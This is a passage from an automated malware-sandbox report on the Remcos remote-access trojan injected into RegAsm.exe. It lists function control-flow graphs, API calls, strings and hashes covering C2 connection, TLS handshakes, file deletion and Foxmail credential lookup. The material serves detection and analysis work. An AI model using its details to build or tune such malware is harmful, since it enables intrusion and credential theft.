401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                APIs
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-GT4655$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                • API String ID: 2830904901-864355567
                                                • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                Function 00414F65 Relevance: 49.8, APIs: 5, Strings: 23, Instructions: 809sleepnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                APIs
                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$ErrorLastLocalTime
                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-GT4655$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                • API String ID: 524882891-3748703744
                                                • Opcode ID: 0bbf41032f1e9047e98c730053b1f0e3a98963d92bbc80a59a2a1b358eeaa471
                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                • Opcode Fuzzy Hash: 0bbf41032f1e9047e98c730053b1f0e3a98963d92bbc80a59a2a1b358eeaa471
                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1094 412e43-412e5f call 401f04 call 41c516 1091->1094 1092->1094 1100 412e61-412e73 call 401f04 DeleteFileW 1094->1100 1101 412e79-412e7b 1094->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1105 412e99-412eab call 406b63 1103->1105 1104->1103 1107 412e81-412e86 1104->1107 1110 412f01-412f20 call 401f09 * 3 1105->1110 1111 412ead-412ebb call 406b63 1105->1111 1107->1103 1107->1105 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1136 412eff 1123->1136 1136->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,68491986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                • API String ID: 1223786279-2576077980
                                                • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                • String ID: )$Foxmail$ProgramFiles
                                                • API String ID: 672098462-2938083778
                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1303 414ed4-414ee5 GetProcAddress 1300->1303 1304 414ee7-414eeb 1303->1304 1305 414eef-414ef2 FreeLibrary 1303->1305 1304->1303 1307 414eed 1304->1307 1308 414ef4-414ef6 1305->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                • API String ID: 2490988753-744132762
                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420cf1 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b580 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1336 404941-40494e call 420f20 1322->1336 1337 404932-40493c 1322->1337 1323->1322 1326 404a71-404a76 1324->1326 1327 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1324->1327 1329 404a7b-404a94 call 402093 * 2 call 41b580 1326->1329 1327->1320 1329->1320 1346 404950-404973 call 402093 * 2 call 41b580 1336->1346 1347 404987-404992 call 421ad1 1336->1347 1337->1329 1376 404976-404982 call 420d31 1346->1376 1360 4049c4-4049d1 call 420e97 1347->1360 1361 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1347->1361 1373 4049d3-4049f6 call 402093 * 2 call 41b580 1360->1373 1374 4049f9-404a14 CreateEventW * 2 1360->1374 1361->1376 1373->1374 1374->1317 1376->1320
                                                APIs
                                                • connect.WS2_32(FFFFFFFF,00DA4958,00000010), ref: 004048E0
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                • API String ID: 994465650-2151626615
                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1389 40da6f-40da94 call 401f86 1392 40da9a 1389->1392 1393 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1389->1393 1395 40dae0-40dae7 call 41c048 1392->1395 1396 40daa1-40daa6 1392->1396 1397 40db93-40db98 1392->1397 1398 40dad6-40dadb 1392->1398 1399 40dba9 1392->1399 1400 40db9a-40db9f call 43c11f 1392->1400 1401 40daab-40dab9 call 41b645 call 401f13 1392->1401 1402 40dacc-40dad1 1392->1402 1403 40db8c-40db91 1392->1403 1415 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1395->1415 1416 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1395->1416 1405 40dbae-40dbb3 call 43c11f 1396->1405 1397->1405 1398->1405 1399->1405 1411 40dba4-40dba7 1400->1411 1423 40dabe 1401->1423 1402->1405 1403->1405 1417 40dbb4-40dbb9 call 409092 1405->1417 1411->1399 1411->1417 1428 40dac2-40dac7 call 401f09 1415->1428 1416->1423 1417->1393 1423->1428 1428->1393
                                                APIs
                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LongNamePath
                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                • API String ID: 82841172-425784914
                                                • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1471 44acc9-44ace2 1472 44ace4-44acf4 call 4467e6 1471->1472 1473 44acf8-44acfd 1471->1473 1472->1473 1480 44acf6 1472->1480 1475 44acff-44ad07 1473->1475 1476 44ad0a-44ad2e MultiByteToWideChar 1473->1476 1475->1476 1478 44ad34-44ad40 1476->1478 1479 44aec1-44aed4 call 43502b 1476->1479 1481 44ad94 1478->1481 1482 44ad42-44ad53 1478->1482 1480->1473 1484 44ad96-44ad98 1481->1484 1485 44ad55-44ad64 call 457210 1482->1485 1486 44ad72-44ad83 call 4461b8 1482->1486 1488 44aeb6 1484->1488 1489 44ad9e-44adb1 MultiByteToWideChar 1484->1489 1485->1488 1499 44ad6a-44ad70 1485->1499 1486->1488 1496 44ad89 1486->1496 1493 44aeb8-44aebf call 435ecd 1488->1493 1489->1488 1492 44adb7-44adc9 call 448c33 1489->1492 1501 44adce-44add2 1492->1501 1493->1479 1500 44ad8f-44ad92 1496->1500 1499->1500 1500->1484 1501->1488 1503 44add8-44addf 1501->1503 1504 44ade1-44ade6 1503->1504 1505 44ae19-44ae25 1503->1505 1504->1493 1508 44adec-44adee 1504->1508 1506 44ae27-44ae38 1505->1506 1507 44ae71 1505->1507 1509 44ae53-44ae64 call 4461b8 1506->1509 1510 44ae3a-44ae49 call 457210 1506->1510 1511 44ae73-44ae75 1507->1511 1508->1488 1512 44adf4-44ae0e call 448c33 1508->1512 1516 44aeaf-44aeb5 call 435ecd 1509->1516 1525 44ae66 1509->1525 1510->1516 1523 44ae4b-44ae51 1510->1523 1515 44ae77-44ae90 call 448c33 1511->1515 1511->1516 1512->1493 1527 44ae14 1512->1527 1515->1516 1529 44ae92-44ae99 1515->1529 1516->1488 1528 44ae6c-44ae6f 1523->1528 1525->1528 1527->1488 1528->1511 1530 44aed5-44aedb 1529->1530 1531 44ae9b-44ae9c 1529->1531 1532 44ae9d-44aead WideCharToMultiByte 1530->1532 1531->1532 1532->1516 1533 44aedd-44aee4 call 435ecd 1532->1533 1533->1493
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
